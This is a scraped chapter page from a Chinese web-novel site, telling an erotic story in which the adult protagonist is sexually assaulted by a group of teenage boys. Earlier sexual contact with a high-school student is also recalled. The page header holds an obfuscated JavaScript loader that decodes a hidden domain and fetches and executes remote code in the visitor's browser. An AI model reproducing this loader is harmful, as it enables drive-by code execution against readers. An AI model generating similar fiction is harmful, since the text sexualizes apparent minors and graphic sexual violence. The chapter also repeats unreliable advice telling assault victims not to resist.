98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第十一章被猥亵,弟弟及时赶到!(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

宋绥到家后才看到梁栎云几十条的信息和未接通的电话。

这才想明白,为什么跳蛋的开关又突然被打开。因为她和曹棘聊得过于忘我,忘记回消息了。

可是即使知道了原因,宋绥的火气也消散不下去,她认为就是因为梁栎云她才会出丑。

使坏的不回消息,直接去洗澡。

一个人静下来之后,所有的记忆都会变得清晰。

想起来刚刚在商场的所作所为,宋绥就感到有些不可思议,怎么可以这么胡闹啊。

甚至连小穴都好像还记得曹棘手指的触感,有些凉,刚开始刺激的穴里的软肉不停地收缩,但是很灵活。

宋绥不禁咬紧嘴唇,将水开大,把这些乱七八糟的想法全都赶出大脑。

之后的几天都平安无事,曹棘偶尔还会给她发消息,因为想着到底有些情谊在,而且他也算是帮了她,因此宋绥多多少少都会回复。

不过想来高中的学业也比较紧张,消息并不频繁。

这天是周五,离下班还有一个小时的时候,宋绥就已经开始盘算下班后去哪里吃饭。

听曹棘说他们学校后面的那条街,有很多好吃的店,便去那里吃吧。

下定决心后,一下班宋绥就冲着目标前进。

不过并没有联系曹棘,因为宋绥是真的想和他拉开些距离。

因为第一次来,宋绥对路线并不是很熟悉,来来回回转了好几遍都没有找到曹棘嘴里的那家很好吃的炸串。

“奇怪,就这么小个地方,怎么就找不到呢?”宋绥因为找不到地方斗志都没有最开始高昂了。

因此也没有注意,那群意怀不轨在不远处盯着她的混混。

“是她吧?”一个染着黄毛的男生问旁边的人。

“就是她!这腿这么白这么直,我看了一次绝对不会记错的!”另一个人嘴里叼着根烟,色眯眯的盯着宋绥短裙下裸露的双腿。

“应该没错,上次她带走曹棘的时候也穿得这双鞋。”

“咱们把她带过来吧?”

“对,带过来威胁曹棘过来,把他揍一顿。”

“说起这个我就气,那天之后我被曹棘那个傻逼带着人围了!”染着黄毛的男生说起这个就咬牙切齿的。

“这女的肯定是他对象,看着身材还挺好的。”

一群人七嘴八舌的讨论着,而宋绥却还不知危险即将到来。

突然一个男生堵在她面前,不怀好意的笑着:“喂!同学和我们走一趟吧!”

“小朋友,你谁啊?”宋绥看面前的人虽然叼着根烟,但明显年龄不大,身后还站着叁个看起来同龄的男生。

“小朋友?你等会儿就知道我是不是小朋友了。”面前的人笑得有些下流。

宋绥原本还觉得一群小屁孩,没什么好搭理的,可是下一秒胳膊就被紧紧地抓住,拖着她就往另外一条街走。

“你们干嘛?松手!”宋绥使劲的想要挣开,可是即使几个男生年龄不大,却依旧无法挣开,这一刻使她深刻的认识到男女力气的差距。

“你们再不放手我就去找你们学校了!”

宋绥拼命地挣扎和尖叫,可是周边却没有一个人伸出援手,这几个男生也丝毫不怕。

“你还要去打小报告?”

“我们可不是你这种乖学生,还会怕老师!”

宋绥一听他们将自己认成了学生,想着他们要是知道自己不是学生应该会感到害怕,“我可不是学生,你们在这样我就报警了!”

“又报警?”

几个人一听宋绥说“报警”,就想起了上次被破坏的好事,怒火中烧。

那个原本叼着根烟的男生,伸手就来撕宋绥身上的裙子。

“啊!”宋绥惊慌的伸手想要抗拒,可是却被另一个人从后面禁住了双手。

“我们给曹棘打过电话了,你说要是他等会儿过来看到你被我们扒光摸光了,还会要你吗?”

宋绥看着面前人的狞笑,这一刻她意识到,这群十七八岁的男生,根本就不是她眼中的“小朋友”!

他们恶劣,无耻,下流!

他们想尽办法来办坏事,来欺负她,只为达到自己的目的,满足自己的恶趣味。

他们真的会去扒女孩子的衣服,上下其手,甚至还可能会强奸她!

可是她却无可奈何。

她连一个男生都挣脱不开,别说四个人了,她的那点力气和挣扎在他们面前不值一提。

宋绥突然想起来之前看的一个文章,里面说如果女孩子遇到强奸犯,一定要冷静,帮强奸犯把裤子脱到脚踝,有机会就逃跑,强奸犯会被裤子绊倒。如果没有机会,一定不要反抗,不然受到伤害的只有女孩子。

此时的她心里面生出了巨大的无力感和悲伤,她比他们年长,比他们懂得多阅历多,可是在这一刻没有丝毫的反抗能力。

“不要!不要!”

一个男生去撕她的裙子的衣领,另一个男生则将手放在她胸部开始了蹂躏。还有不知道谁的手,掀开了她的裙子,隔着安全裤去揉她的小穴。

“求求你们,别碰我!”宋绥的声音都是颤抖的,带着哀求的开口。

“你那天不是挺厉害的吗?”那个男生撕开了她的衣领,漏出了雪白的肩膀和锁骨,一片白花花的软肉。

“把她内裤扒了!”不知道是谁喊了一声,就感到有两叁只手来到她的下身,要去把她的底裤。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间